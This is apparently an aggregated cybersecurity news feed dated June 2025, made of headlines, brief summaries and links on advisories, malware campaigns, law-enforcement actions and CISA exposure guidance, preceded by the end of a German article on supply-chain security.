Regelmäßige Sicherheitsaudits und Tests von Netzwerken und Systemen helfen, Schwachstellen frühzeitig zu erkennen und zu beheben. Die Kommunikation zwischen den verschiedenen Abteilungen und ihren Mitarbeitern sollte ebenfalls gestärkt werden, damit das Unternehmen im Krisenfall schnell handlungsfähig ist. Nicht zuletzt muss natürlich die Lieferkette ständig überwacht werden. Keine Software ist perfekt – wenn Supply-Chain-Angriffe wie Solarwinds oder XZ öffentlich werden, gilt es sofort zu handeln und die betroffenen Programme sowie Bibliotheken auf Schwachstellen zu untersuchen und diese zu beheben. Ein entscheidendes Kriterium bei der Auswahl eines Software-Lieferanten muss daher sein: ein Informationssicherheitsteam mit soliden Prozessen, die exakt evaluiert und bewertet werden können. Wie schnell reagiert das Team auf die Meldung von Schwachstellen? Wie schnell werden sie behoben? Und wie offen und transparent wird kommuniziert? Je transparenter Software-Anbieter hier handeln und kommunizieren, desto eher werden sie zu einem zuverlässigen und unverzichtbaren Bestandteil der Lieferkette. Zusammenarbeit schützt Lieferketten Um Software-Lieferketten zu schützen, muss jeder Teil der Supply Chain etwas beitragen, damit es Cyberkriminellen nicht gelingt, durch die Infizierung einer einzelnen Stelle die ganze Kette zu gefährden. Für Unternehmen heißt dies, einen ganzheitlichen Sicherheitsansatz zu verfolgen und moderne Technologien wie maschinelles Lernen und generative KI einzusetzen und kontinuierlich weiterzuentwickeln. Hersteller sollten Informationssicherheit sehr ernst nehmen und schnell sowie transparent handeln – so werden Software-Lieferketten und darauf aufbauende Wirtschaftsbereiche bestmöglich geschützt. (jm)

https://www.csoonline.com/article/3495329/cybersecurity-in-der-lieferkettewie-sie-ihre-software-supply-chain-schutzen.html
CISA asks CISOs: Does that asset really have to be on the internet?
2025-06-06T02:53:19Z | 1749178399

The US Cybersecurity and Infrastructure Security Agency (CISA) this week issued guidance to infosec pros on ways they can find insecure IT and OT systems, including servers, databases, sensors, switches, routers, and industrial control systems, and shield them from the public internet. Misconfigured systems, default credentials, and outdated software are often easily discovered through free internet-based search and discovery platforms such as Shodan, Censys.io and Thingful, tools that crooks as well as defenders can use, the guidance warns. And the discovery this week of an unprotected 12TB database of sensitive personal information exposed on the internet is yet another example of how these mistakes or unpatched vulnerabilities leave crucial information held by organizations exposed for plucking. Guidance from CISA Solving the problem is simple for a CISO, the guidance said: Just ask, ‘Does this have to be open to the internet?’ That, of course, assumes they know every asset in their IT/OT environment, which means, to begin with, every organization has to do an asset inventory. There’s no shortage of vendors offering asset management software, and in some countries, their national cybersecurity agency (CISA in the US) may do vulnerability scans for organizations. Then the CISO has to evaluate which assets need to be internet-accessible for operational purposes by using these yardsticks: Necessity: Is the exposed system or service essential for operations? Business justification: What operational need requires this exposure? Security measures: Can you restrict access via VPNs or better secure it with multifactor authentication? Maintenance: Is the system or service up to date with the latest security patches? Assets and services that don’t have to be open to the internet should either be disconnected or have their access restricted. But make sure the changes don’t inadvertently disrupt essential services or operations, the CISA guidance adds. The third step is to mitigate risks to remaining exposed assets by: changing default passwords and enforcing strong authentication mechanisms; creating a patch management regime to ensure systems are patched; utilizing Virtual Private Networks (VPNs) to secure remote access; implementing multifactor authentication (MFA) where possible. Finally, CISOs should regularly review and monitor internet-accessible assets to make sure policy is being enforced. The guidance doesn’t mention it, but employee awareness training also plays a role, because some or all staff may have the ability to put an asset unsafely online directly, or through the use of a cloud storage platform (for example, Dropbox or an Amazon S3 data bucket) or a cloud data processing service (for example, Amazon AWS, Microsoft Azure). How big is the problem? It’s not easy to quantify the number of breaches of security controls and data thefts due to unpatched assets, or assets being online when they shouldn’t be, but the latest Verizon Data Breach Investigation report says 60% of the breaches it looked at involved a human element (including misconfigurations, errors, and credential abuse). Credential abuse was an initial access factor in 22% of the breaches, closely followed by exploitation of vulnerabilities (20%). But CISOs need to ask themselves how many breaches of security controls during their careers were related to things that shouldn’t have been exposed to the internet in the first place. Exposed assets, in particular, assets exposed without proper configuration and management, are a huge issue, said Johannes Ullrich, dean of research at the SANS Institute. Guidance ‘covers the basics’ “The data we collect at the Internet Storm Center shows that assets are scanned and discovered within minutes of being exposed,” he said in an email. “The top targets are exposed telnet and SSH servers with weak passwords, web-based admin consoles for various devices (cameras, firewalls, network storage devices), and remote access tools like [Windows] RDP.” This has become an even larger problem with so many applications being deployed in the cloud, he added, which does make it much more difficult to restrict access to them.  “The CISA guidance is making good points and covers the basics,” he said, “but the tricky part is to scale these efforts. Public search engines like Shodan and Censys are helpful [to infosec pros], but they should not replace regular scans from an external IP address.” Additional defenses The CISA recommendations fall into the category of core fundamentals that any organization has an obligation to address, said David Lewis, global advisory CISO at 1Password. “Defense in depth is essential.” While CISA’s guidance provides a solid foundation, he suggested some enhancements that can be employed: Identity and Access Management (IAM) is absolutely critical in cybersecurity. Misconfigurations and compromised credentials are significant vulnerabilities that plague our daily lives, especially as organizations adopt complex identity ecosystems. Incorporating detailed IAM strategies into exposure reduction efforts could strengthen the guidance. Device Trust and Compliance: Security programs should work to ensure that only trusted, compliant devices access organizational resources. The risks posed by unmanaged or non-compliant devices, or shadow IT, can be exploited by attackers. Thus integrating device compliance checks into exposure assessments could enhance security. “CISA’s guidance offers valuable steps for reducing internet exposure,” he said. “However, incorporating comprehensive IAM practices, extended access management, and device compliance measures could provide a more robust defense against cyber threats. By addressing these areas, organizations can better protect themselves against breaches stemming from unnecessary internet exposure.”

https://www.csoonline.com/article/4002771/cisa-asks-cisos-does-that-asset-really-have-to-be-on-the-internet.html
IT vs OT: A Comprehensive Guide
2025-06-06T02:07:02Z | 1749175622

In today's rapidly evolving industrial landscape, the lines between Information Technology (IT) and Operational Technology (OT) are blurring like never before. For decades, these two domains operated in separate silos, each with distinct purposes, technologies, and security requirements. However, digital transformation, Industry 4.0 initiatives, and the growing demand for real-time data analytics are driving unprecedented convergence between IT and OT systems.

https://www.zentera.net/blog/it-vs-ot
US offers $10M for tips on state hackers tied to RedLine malware
2025-06-06T02:00:09Z | 1749175209

The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov. The same bounty covers leads on state hackers' use of this malware in cyber operations targeting critical infrastructure organizations in the United States. This bounty is posted as part of the Department of State's Rewards for Justice program established by the 1984 Act to Combat International Terrorism, which rewards informants for tips that help identify or locate foreign government threat actors behind cyberattacks against U.S. entities.

https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-state-hackers-tied-to-redline-malware/
US govt login portal could be one cyberattack away from collapse, say auditors
2025-06-06T02:00:08Z | 1749175208

The US government's Login.gov identity verification system could be one cyberattack, or just a routine IT hiccup, away from serious trouble, say auditors, because it hasn't shown its backup testing policy is actually in use or effective. The US Government Accountability Office reported Tuesday that Login.gov, which is managed by the federal government's General Services Administration (GSA) procurement branch, has mostly complied with prior recommendations to improve the seven-year-old centralized login service for US citizens. "Mostly" doesn't include any scheme to keep an eye on the state of its data backups, however, which could be disastrous if they had to be pulled out of storage to restore damaged systems.

https://www.theregister.com/2025/06/04/login_gov_backup_testing_insufficient_gao/
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
2025-06-06T02:00:07Z | 1749175207

The Ukrainian police arrested a 35-year-old hacker who breached 5,000 accounts at an international hosting company and used them to mine cryptocurrency, resulting in $4.5 million in damages. "The suspect illegally gained access to over 5,000 accounts belonging to clients of an international hosting company that provides server rental services for the operation of various websites and online platforms," reads the police's announcement. "After gaining access to these accounts, the perpetrator began unauthorized deployment of virtual machines (software that emulates a computer's operation) using the company's server resources." As the threat actor utilized the accounts to mine cryptocurrency on the hosting provider's servers, the resulting damages were estimated to be $4,500,000.

https://www.bleepingcomputer.com/news/security/hacker-arrested-for-breaching-5-000-hosting-accounts-to-mine-crypto/
Ukrainian carriers are leasing their IPv4 addresses to stay afloat - sometimes after being overrun by Russia
2025-06-06T02:00:06Z | 1749175206

Ukrainian telcos and ISPs have leased their IPv4 holdings to stay afloat during the nation’s war with Russia. Network intelligence service provider Kentik advanced that theory last week in an analysis written by its director of internet analysis Doug Madory. The researcher found “several cases in which large amounts of IPv4 space, formerly originated by prominent Ukrainian [autonomous systems] ASes, have moved out of the country (often with the help of IPv4 brokers) to dozens of new origins, including major cloud providers, hosting operations, and international telecoms.” Madory thinks the result is “a dramatic reduction in Ukraine’s footprint in the global routing table — a new consequence of a protracted war in the digital age.”

https://www.theregister.com/2025/06/05/ukraine_ipv4_loss_kentik_analysis/
Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine
2025-06-06T02:00:05Z | 1749175205

Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints. Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities. The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war.

https://blog.talosintelligence.com/pathwiper-targets-ukraine/
BidenCash darknet forum taken down by US, Dutch law enforcement
2025-06-06T02:00:04Z | 1749175204

Nearly 145 domains associated with the BidenCash cybercriminal marketplace were taken down on Wednesday in a law enforcement operation led by U.S. and Dutch authorities. BidenCash, which appropriated the name and image of the former U.S. president, has existed since 2022 and was used primarily as a way to sell stolen credit card numbers, compromised credentials and personal information. The U.S. Department of Justice (DOJ) said that at its peak, the platform had more than 117,000 customers and generated $17 million in revenue from the sale of about 15 million payment card numbers and troves of personal information. Several domains associated with the site have been replaced with splash images showing the insignias of the DOJ, FBI, U.S. Secret Service and the Dutch High Tech Crime Unit.

https://therecord.media/bidencash-cybercrime-darknet-market-takedown-us-netherlands
BladedFeline: Whispering in the dark
2025-06-06T02:00:03Z | 1749175203

In 2024, ESET researchers discovered several malicious tools in the systems used by Kurdish and Iraqi government officials. The APT group behind the attacks is BladedFeline, an Iranian threat actor that has been active since at least 2017, when it compromised officials within the Kurdistan Regional Government (KRG). This group develops malware for maintaining and expanding access within organizations in Iraq and the KRG. While this is our first blogpost covering BladedFeline, we discovered the group in 2023, after it targeted Kurdish diplomatic officials with the Shahmaran backdoor, and previously reported on its activities in ESET APT Activity reports Q4 2023-Q1 2024 and Q2 2024-Q3 2024. BladedFeline is an Iran-aligned cyberespionage group, active since at least 2017 according to ESET telemetry. We discovered the group in 2023 when it deployed its Shahmaran backdoor against Kurdish diplomatic officials.

https://www.welivesecurity.com/en/eset-research/bladedfeline-whispering-dark/
Cisco warns of ISE and CCP flaws with public exploit code
2025-06-06T02:00:02Z | 1749175202

Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments. The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments. Unauthenticated attackers can exploit it by extracting user credentials from Cisco ISE cloud deployments and using them to access installations in other cloud environments. However, as Cisco explained, threat actors can exploit this flaw successfully only if the Primary Administration node is deployed in the cloud.

https://www.bleepingcomputer.com/news/security/cisco-warns-of-ise-and-ccp-flaws-with-public-exploit-code/
Prep for Layoffs Before They Compromise Security
2025-06-06T01:43:14Z | 1749174194

Mass layoffs create cybersecurity vulnerabilities through dormant accounts and disgruntled employees.

https://www.darkreading.com/cybersecurity-operations/prep-layoffs-before-compromise-security
Cisco Identity Services Engine on Cloud Platforms Static Credential Vulnerability
2025-06-06T00:26:25Z | 1749169585

A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems. This vulnerability exists because credentials are improperly generated when Cisco ISE is being deployed on cloud platforms, resulting in different Cisco ISE deployments sharing the same credentials. These credentials are shared across multiple Cisco ISE deployments as long as the software release and cloud platform are the same. An attacker could exploit this vulnerability by extracting the user credentials from Cisco ISE that is deployed in the cloud and then using them to access Cisco ISE that is deployed in other cloud environments through unsecured ports. A successful exploit could allow the attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems. Note: If the Primary Administration node is deployed in the cloud, then Cisco ISE is affected by this vulnerability. If the Primary Administration node is on-premises, then it is not affected. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7 Security Impact Rating: Critical CVE: CVE-2025-20286

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7
Multiples vulnérabilités dans les produits IBM (06 juin 2025)
2025-06-06T00:00:00Z | 1749168000

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0481/
Multiples vulnérabilités dans le noyau Linux de Red Hat (06 juin 2025)
2025-06-06T00:00:00Z | 1749168000

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, un déni de service et un problème de sécurité non spécifié par l'éditeur.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0480/
Multiples vulnérabilités dans le noyau Linux de SUSE (06 juin 2025)
2025-06-06T00:00:00Z | 1749168000

De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0482/
Customer Story: Canadian Construction Firm
2025-06-05T23:47:05Z | 1749167225

The post Customer Story: Canadian Construction Firm appeared first on Graylog.

https://graylog.org/resources/customer-story-canadian-construction-firm/
Customer Story: U.S. Education IT Provider
2025-06-05T23:44:50Z | 1749167090

The post Customer Story: U.S. Education IT Provider appeared first on Graylog.

https://graylog.org/resources/customer-story-u-s-education-it-provider/
Google’s upcoming Gemini Kingfall is allegedly a coding beast
2025-06-05T23:41:25Z | 1749166885

Google's AI advancement is not slowing down, and we might be getting yet another powerful model codenamed "Gemini Kingfall."

https://www.bleepingcomputer.com/news/artificial-intelligence/googles-upcoming-gemini-kingfall-is-allegedly-a-coding-beast/
Customer Story: Australian Media Company
2025-06-05T23:37:27Z | 1749166647

The post Customer Story: Australian Media Company appeared first on Graylog.

https://graylog.org/resources/customer-story-australian-media-company/
Uncle Sam puts $10M bounty on RedLine dev and Russia-backed cronies
2025-06-05T23:04:24Z | 1749164664

Any info on Maxim Rudometov and his associates? There's $$$ in it for you The US government is offering up to $10 million for information on foreign government-backed threat actors linked to the RedLine malware, including its suspected developer, Maxim Alexandrovich Rudometov.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/rewards_for_justice_maxim_rudometov/
ChatGPT prepares o3-pro model for $200 Pro subscribers
2025-06-05T22:45:53Z | 1749163553

OpenAI is planning to ship an update to ChatGPT that will turn on the new o3 Pro model, which has more compute to think harder.

https://www.bleepingcomputer.com/news/artificial-intelligence/chatgpt-prepares-o3-pro-model-for-200-pro-subscribers/
Proxy Services Feast on Ukraine’s IP Address Exodus
2025-06-05T22:44:33Z | 1749163473

Ukraine has seen nearly one-fifth of its Internet space come under Russian control or sold to Internet address brokers since February 2022, a new study finds. The analysis indicates large chunks of Ukrainian Internet address space are now in the hands of proxy and anonymity services nested at some of America's largest Internet service providers (ISPs).

https://krebsonsecurity.com/2025/06/proxy-services-feast-on-ukraines-ip-address-exodus/
SecOps Need to Tackle AI Hallucinations to Improve Accuracy
2025-06-05T22:39:16Z | 1749163156

AI is increasingly embedded into threat detection and response tools, but hallucinations can lead to false positive and inaccurate guidance. The AI-associated risk can't be completely eradicated, but SecOps teams can take steps to at least limit the effects.

https://www.darkreading.com/vulnerabilities-threats/secops-tackle-ai-hallucinations-improve-accuracy
Recent Attacks Highlight Elevated Threat to Israeli and Jewish Communities
2025-06-05T22:30:00Z | 1749162600

Recent Attacks Highlight Elevated Threat to Israeli and Jewish Communities

https://www.ic3.gov/PSA/2025/PSA250605-2
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme
2025-06-05T22:25:00Z | 1749162300

Authorities said they froze and seized the allegedly illegally obtained funds when North Korean nationals attempted to launder money linked to the long-running conspiracy. The post DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme appeared first on CyberScoop.

https://cyberscoop.com/doj-seizure-crypto-north-korea-it-workers/
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme
2025-06-05T22:25:00Z | 1749162300

Authorities said they froze and seized the allegedly illegally obtained funds when North Korean nationals attempted to launder money linked to the long-running conspiracy. The post DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme appeared first on CyberScoop.

https://cyberscoop.com/doj-seizure-crypto-north-korea-it-workers/
AT&T not sure if new customer data dump is déjà vu
2025-06-05T22:05:31Z | 1749161131

Re-selling info from an earlier breach? Probably. But which one? AT&T is investigating claims that millions of its customers' data are listed for sale on a cybercrime forum in what appears to be a re-release from an earlier hack.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/att_investigates_data_dump/
Lawmakers warn that UK’s Apple backdoor demand ‘sets a dangerous precedent’
2025-06-05T21:46:00Z | 1749159960

Rep. Jamie Raskin, D-Md., ranking member of the House Judiciary Committee, said "forcing companies to circumvent their own encrypted services in the name of security is the beginning of a dangerous slippery slope."

https://www.nextgov.com/cybersecurity/2025/06/lawmakers-warn-uks-apple-backdoor-demand-sets-dangerous-precedent/405861/
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
2025-06-05T21:35:43Z | 1749159343

The FBI is warning that the BADBOX 2.0 malware campaign has infected over 1 million home Internet-connected devices, converting consumer electronics into residential proxies that are used for malicious activity.

https://www.bleepingcomputer.com/news/security/fbi-badbox-20-android-malware-infects-millions-of-consumer-devices/
Customer Story: Indian Construction IT Team
2025-06-05T21:30:30Z | 1749159030

The post Customer Story: Indian Construction IT Team appeared first on Graylog.

https://graylog.org/resources/customer-story-indian-construction-it-team/
Customer Story: Indian Public Education Provider
2025-06-05T21:28:25Z | 1749158905

The post Customer Story: Indian Public Education Provider appeared first on Graylog.

https://graylog.org/resources/customer-story-indian-public-education-provider/
Customer Story: Global IT Services Firm
2025-06-05T21:25:42Z | 1749158742

The post Customer Story: Global IT Services Firm appeared first on Graylog.

https://graylog.org/resources/customer-story-global-it-services-firm/
Customer Story: U.S. Energy Provider
2025-06-05T21:23:19Z | 1749158599

The post Customer Story: U.S. Energy Provider appeared first on Graylog.

https://graylog.org/resources/customer-story-u-s-energy-provider/
Customer Story: Irish IT Services Firm
2025-06-05T21:15:16Z | 1749158116

The post Customer Story: Irish IT Services Firm appeared first on Graylog.

https://graylog.org/resources/customer-story-irish-it-services-firm/
U.S. CISA adds Google Chromium V8 flaw to its Known Exploited Vulnerabilities catalog
2025-06-05T21:03:56Z | 1749157436

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Google Chromium V8 vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Google Chromium V8 Out-of-Bounds Read and Write Vulnerability, tracked as CVE-2025-5419, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Google released out-of-band updates to address three vulnerabilities […]

https://securityaffairs.com/178678/security/u-s-cisa-google-chromium-v8-flaw-known-exploited-vulnerabilities-catalog.html
Powering ZTNA Strategies with Unified Access Control
2025-06-05T21:02:01Z | 1749157321

Introduction to Unified Access Control and ZTNA Protecting vital data and infrastructure is crucial. Zero Trust Network Access (ZTNA) has emerged as a fundamental strategy for reducing cybersecurity risks, insisting that organizations verify every interaction within their networks. Unified Access Control (UAC) complements ZTNA by providing enhanced visibility and control over user access, regardless of… The post Powering ZTNA Strategies with Unified Access Control appeared first on Portnox.

https://www.portnox.com/blog/network-access-control/powering-ztna-strategies-with-unified-access-control/
Digital Forensics Firm Cellebrite to Acquire Corellium
2025-06-05T21:01:13Z | 1749157273

Cellebrite, a controversial digital forensics firm, is set to acquire virtualization vendor Corellium in a $170 million deal.

https://www.darkreading.com/mobile-security/digital-forensics-firm-cellebrite-acquire-corellium
Skybox Is Gone. The Risk of Waiting Isn’t.
2025-06-05T21:00:02Z | 1749157202

Skybox Is Gone. The Risk of Waiting Isn’t. Skybox is gone, but your compliance deadlines, audit obligations, and security risks are very much alive. Here’s why EMEA organisations must act...

https://www.firemon.com/blog/skybox-os-gone-the-risk-of-waiting-is-not/
Wrong time for Trump admin to end mobile app security program, cyber lawmaker says
2025-06-05T20:41:00Z | 1749156060

Amid a major Chinese intrusion into U.S. telecoms, New York Republican Rep. Andrew Garbarino says CISA’s Mobile App Vetting program shouldn’t be terminated.

https://www.nextgov.com/cybersecurity/2025/06/wrong-time-trump-admin-end-mobile-app-security-program-cyber-lawmaker-says/405856/
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
2025-06-05T20:36:58Z | 1749155818

Cisco Talos researchers observed the new wiper malware in a destructive attack against an unnamed critical infrastructure organization.

https://www.darkreading.com/cyberattacks-data-breaches/pathwiper-attack-critical-infrastructure-ukraine
Cisco Warns of Credential Vuln on AWS, Azure, Oracle Cloud
2025-06-05T20:29:49Z | 1749155389

The vulnerability, with a 9.9 CVSS score on a 10-point scale, results in different Cisco ISE deployments all sharing the same credentials as long as the software release and cloud platform remain the same.

https://www.darkreading.com/vulnerabilities-threats/cisco-warns-critical-static-credential-vulnerability
New versions of Chaos RAT target Windows and Linux systems
2025-06-05T20:29:16Z | 1749155356

Acronis researchers reported that new Chaos RAT variants were employed in 2025 attacks against Linux and Windows systems. Acronis TRU researchers discovered new Chaos RAT variants targeting Linux and Windows in recent attacks. Originally seen in 2022, Chaos RAT evolved in 2024, with fresh samples emerging in 2025. TRU also discovered a critical flaw in […]

https://securityaffairs.com/178670/malware/new-versions-of-chaos-rat-target-windows-and-linux-systems.html
Revolutionizing Your LAN: Seamless Management and Complete Visibility with Versa Secure SD-LAN
2025-06-05T20:26:34Z | 1749155194

Are you struggling with traditional LAN environments that lead to slow, error-prone manual setups, poor visibility and security for IoT/OT devices, inconsistent security enforcement, complex management, costly and challenging scaling, and slow response to performance and security issues? The post Revolutionizing Your LAN: Seamless Management and Complete Visibility with Versa Secure SD-LAN first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/revolutionizing-your-lan-seamless-management-and-complete-visibility-with-versa-secure-sd-lan/
Cellebrite buys Corellium to help cops bust phone encryption
2025-06-05T20:10:14Z | 1749154214

Trump-pardoned hacker Chris Wade will join the company as CTO Cellebrite has announced a $170 million deal to buy Corellium, bringing together two companies that have made names for themselves by helping law enforcement break into encrypted devices.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/cellebrite_corellium_merger/
Trump’s national cyber director nominee dodges criticism of funding cuts
2025-06-05T19:45:00Z | 1749152700

Sean Cairncross said his managerial experience has prepared him well to lead a relatively new White House cyber unit.

https://www.cybersecuritydive.com/news/sean-cairncross-national-cyber-director-confirmation-hearing/749993/
Trump’s national cyber director nominee dodges criticism of funding cuts
2025-06-05T19:45:00Z | 1749152700

Sean Cairncross said his managerial experience has prepared him well to lead a relatively new White House cyber unit.

https://www.cybersecuritydive.com/news/sean-cairncross-national-cyber-director-confirmation-hearing/749993/
Trump’s cyber czar pick grilled over CISA cuts: ‘If we have a cyber 9/11, you’re the guy’
2025-06-05T19:40:48Z | 1749152448

Plus: Plankey's confirmation process 'temporarily delayed' Sean Cairncross, President Donald Trump's nominee to serve as national cyber director, doubled down on taking offensive cyber actions against foreign adversaries during a Senate homeland security committee nomination hearing on Thursday, and refused to condemn the president's proposed cuts to the main US cyber defense agency.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/trump_cyber_nominee_cairncross/
Misconfigured HMIs Expose US Water Systems to Anyone With a Browser
2025-06-05T19:34:27Z | 1749152067

Censys researchers follow some clues and find hundreds of control-room dashboards for US water utilities on the public internet. The post Misconfigured HMIs Expose US Water Systems to Anyone With a Browser appeared first on SecurityWeek.

https://www.securityweek.com/misconfigured-hmis-expose-us-water-systems-to-anyone-with-a-browser/
Iranian APT ‘BladedFeline’ Remains Hidden in Networks for 8 Years
2025-06-05T19:27:00Z | 1749151620

ESET researchers have uncovered the persistent activities of BladedFeline, an Iranian-aligned Advanced Persistent Threat (APT) group, which has maintained covert access to the networks of Kurdish and Iraqi government officials for nearly eight years. First identified in 2017 through attacks on the Kurdistan Regional Government (KRG), BladedFeline has since evolved into a sophisticated cyberespionage entity, […] The post Iranian APT ‘BladedFeline’ Remains Hidden in Networks for 8 Years appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/iranian-apt-bladedfeline-remains-hidden/
Trump administration debuts permitting modernization plan, even as staff cuts could jeopardize it
2025-06-05T19:23:00Z | 1749151380

The new plan builds on Biden-era work, but how implementation goes during Trump-era workforce reductions remains to be seen.

https://www.nextgov.com/modernization/2025/06/trump-administration-debuts-permitting-modernization-plan-even-staff-cuts-could-jeopardize-it/405848/
Alleged data breach of NBN Co
2025-06-05T19:21:05Z | 1749151265

Alleged data breach of NBN Co

https://darkwebinformer.com/alleged-data-breach-of-nbn-co/
Tracking the Big Shifts in Cybersecurity: From AI Code Generation to Third-Party Oversight
2025-06-05T19:11:35Z | 1749150695

The following is a guest post from Troy Leach, Former Executive on the PCI Security Standards Counsel and Chief Strategy Officer at CSA. As I walked into the Moscone Center last month, I realized that this was likely my 20th year at the RSAC. It often feels like a mini-reunion.  In fact, I stopped to […] The post Tracking the Big Shifts in Cybersecurity: From AI Code Generation to Third-Party Oversight appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/shifts-cybersecurity-ai-client-side/
New Chaos RAT Targets Linux and Windows Users to Steal Sensitive Data
2025-06-05T19:00:00Z | 1749150000

A new wave of cyber threats has emerged with the discovery of updated variants of Chaos RAT, a notorious open-source remote administration tool (RAT) first identified in 2022. As reported by Acronis TRU researchers in their recent 2025 analysis, this malware continues to evolve, targeting both Linux and Windows environments with sophisticated capabilities for espionage […] The post New Chaos RAT Targets Linux and Windows Users to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/new-chaos-rat-targets-linux-and-windows-users/
Home Internet Connected Devices Facilitate Criminal Activity
2025-06-05T19:00:00Z | 1749150000

Home Internet Connected Devices Facilitate Criminal Activity

https://www.ic3.gov/PSA/2025/PSA250605
Ross Ulbricht Got a $31 Million Donation From a Dark Web Dealer, Crypto Tracers Suspect
2025-06-05T18:50:16Z | 1749149416

Crypto-tracing firm Chainalysis says the mysterious 300-bitcoin donation to the pardoned Silk Road creator appears to have come from someone associated with a different defunct black market: AlphaBay.

https://www.wired.com/story/ross-ulbricht-31-million-donation-alphabay/
ViperSoftX Malware Enhances Modularity, Stealth, and Persistence Techniques
2025-06-05T18:32:00Z | 1749148320

The cybersecurity landscape witnessed the emergence of new PowerShell-based malware samples circulating in underground forums and threat-hunting communities, marking a significant evolution of the notorious ViperSoftX stealer. This updated variant, building on its 2024 predecessor, showcases remarkable advancements in modularity, stealth, and persistence mechanisms, posing a heightened threat to cryptocurrency users and enterprises. Detailed analysis […] The post ViperSoftX Malware Enhances Modularity, Stealth, and Persistence Techniques appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/vipersoftx-malware-enhances-modularity/
Meet the Threat Hunters Who Alert Security Teams To What’s Coming
2025-06-05T18:30:00Z | 1749148200

Extensive intel and expert analysis make our Threat Hunters a key component in protecting organizations from today’s critical threats

https://www.security.com/feature-stories/meet-threat-hunters-who-alert-security-teams-whats-coming
Backdoored Malware Reels in Newbie Cybercriminals
2025-06-05T18:27:05Z | 1749148025

Sophos researchers found this operation has similarities or connections to many other campaigns targeting GitHub repositories dating back to August 2022.

https://www.darkreading.com/threat-intelligence/backdoored-malware-new-cybercriminals
Water utilities mitigate equipment flaws after researchers find widespread exposures
2025-06-05T18:24:28Z | 1749147868

Censys researchers said hundreds of water treatment facilities have taken steps to protect against malicious cyber intrusions.

https://www.cybersecuritydive.com/news/water-utilities-mitigate-flaws-find-exposures/749980/
Water utilities mitigate equipment flaws after researchers find widespread exposures
2025-06-05T18:24:28Z | 1749147868

Censys researchers said hundreds of water treatment facilities have taken steps to protect against malicious cyber intrusions.

https://www.cybersecuritydive.com/news/water-utilities-mitigate-flaws-find-exposures/749980/
China Accuses Taiwan of Operating APT Groups with US Support
2025-06-05T18:05:00Z | 1749146700

China has accused Taiwan’s Democratic Progressive Party (DPP) authorities of orchestrating a series of sophisticated cyber attacks through Advanced Persistent Threat (APT) groups. Referred to as “T-APTs,” these groups are allegedly supported by Taiwan’s Information, Communications and Electronic Force Command (ICEFCOM) and are claimed to have close ties with the United States. Allegations of Cyber […] The post China Accuses Taiwan of Operating APT Groups with US Support appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/china-accuses-taiwan-of-operating-apt-groups/
#Infosec2025: Cybersecurity Lessons From Maersk’s Former CISO
2025-06-05T18:05:00Z | 1749146700

2017 ransomware attack on shipping company A P Moller Maersk marked a turning point for the cybersecurity industry, according to its former CISO Adam Banks

